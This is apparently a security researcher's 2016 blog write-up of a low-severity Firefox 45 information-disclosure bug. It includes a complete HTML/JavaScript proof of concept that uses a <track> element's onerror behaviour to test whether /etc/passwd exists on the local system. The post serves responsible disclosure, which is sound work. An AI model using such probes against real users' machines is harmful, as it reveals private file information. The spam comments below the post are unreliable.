Monday 22 August 2016

Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type "csectype-disclosure" and was flagged as sec-low by Mozilla's team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).

The bug existed because a <track>'s onerror event is fired twice if the file pointed to in it's src attribute doesn't exist, but fires only once if the file existed but is not playable. The <track> tag has to be included inside the opening and closing tags of an <audio> or <video>. The following code is the PoC that was typically sent along with the report to Mozilla's team:

<html>
<head>
<title>Testing</title>
</head>
<audio>
   <track id="q" src="file:///etc/passwd">
</audio>
<script>
var i=0;
q.onerror=function(){
    i++;
   
};
setTimeout(function(){
    if(i==1){
            alert('File Exists');
        }else{
            alert('File Does Not Exist');
            }
 
    },100);
</script>
</body>
</html
 
Finally, I would like to shout out to @Qab for making all that possible.
Posted by at

10 comments:

  1. zohaib9 May 2017 at 12:31

    straggal this,,,

    ReplyDelete
  2. zohaib9 May 2017 at 12:34

    free fox,,,,

    ReplyDelete
  3. vaiybora28 August 2017 at 11:20

    Your blog is very useful for me.I really like you post.Thanks for sharing.

    ซอมบี้

    ReplyDelete
  4. Anonymous16 November 2017 at 06:23

    Great Article it its really informative and innovative keep here: with new updates. Its was really valuable. Thanks a lot. Search Bar Firefox 57 Quantum addon

    ReplyDelete
  5. Ralph Steil2 July 2019 at 11:35

    Thanks for the sharing these amazing content i really enjoyed it what a nice information provide such an help full for us keep doing great job.
    i have some interesting information for you What is Roblox and Who Plays It
    check out

    ReplyDelete
  6. Ufa88kh6 January 2022 at 00:10

    I like your blog,I sincerely hope that your blog a rapid increase in
    traffic density,which help promote your blog and we hope that your blog is being updated.
    wordpress
    blogspot
    youtube
    បាការ៉ាត់អនឡាញ

    ReplyDelete
  7. Anonymous28 April 2022 at 15:47

    MMORPG
    İnstagram Takipçi Satın Al
    tiktok jeton hilesi
    Tiktok jeton hilesi
    antalya sac ekimi
    referans kimliği nedir
    İNSTAGRAM TAKİPÇİ SATIN AL
    metin2 pvp serverlar
    İnstagram Takipçi

    ReplyDelete
  8. Anonymous15 May 2022 at 11:36

    perde modelleri
    sms onay
    vodafone mobil ödeme bozdurma
    HTTPS://NFTNASİLALİNİR.COM
    ankara evden eve nakliyat
    trafik sigortası
    DEDEKTOR
    Web sitesi kurma
    Ask Kitaplari

    ReplyDelete
  9. สล็อต พีจี 24 December 2022 at 08:32

    superslot เล่น ผ่าน เว็บ เว็บไซต์สล็อตออนไลน์ รูปแบบใหม่ ซุปเปอร์สล็อตเอ็กซ์ดี มาแรง กับ pg-slot.game ที่มาแรงที่สุดในขณะนี้ ทางพวกเราเป็นคนที่ให้บริการเกม พีจีสล็อต ที่สนุกที่สุด

    ReplyDelete
  10. ทดลองpg รับฟรีเครดิต24 December 2022 at 08:32

    สล็อต เว็บ ตรง จากค่ายเกมสล็อตออนไลน์ชื่อดังอันดับ 1 ที่นักพนันทั่วโลกให้การยอมรับว่าเป็นค่ายเกมสล็อตออนไลน์ที่ดีที่สุดตลอดกาลกับค่าย PG SLOT ที่มาแรงที่สุดในปี 2022

    ReplyDelete

Subscribe to: Post Comments (Atom)